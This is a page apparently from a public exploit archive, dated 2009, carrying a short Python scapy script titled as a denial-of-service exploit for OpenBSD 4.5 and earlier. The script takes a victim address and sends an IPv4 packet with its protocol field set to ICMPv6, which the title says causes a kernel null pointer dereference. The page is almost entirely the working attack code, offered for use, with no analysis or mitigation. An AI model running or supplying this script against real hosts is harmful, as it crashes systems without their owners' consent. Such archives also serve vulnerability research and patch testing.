[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : OpenBSD <= 4.5 IP datagram Null Pointer Deref DoS Exploit
# Published : 2009-04-14
# Author : nonroot
# Previous Title : Steamcast 0.9.75b Remote Denial of Service Exploit
# Next Title : PowerCHM 5.7 (Long URL) Local Stack Overflow PoC
import sys
from scapy import *
victim=sys.argv[1]
icmpv6=58
p=IP(dst=victim)
p.proto=icmpv6
sr(p,timeout=1)
# www.Syue.com [2009-04-14]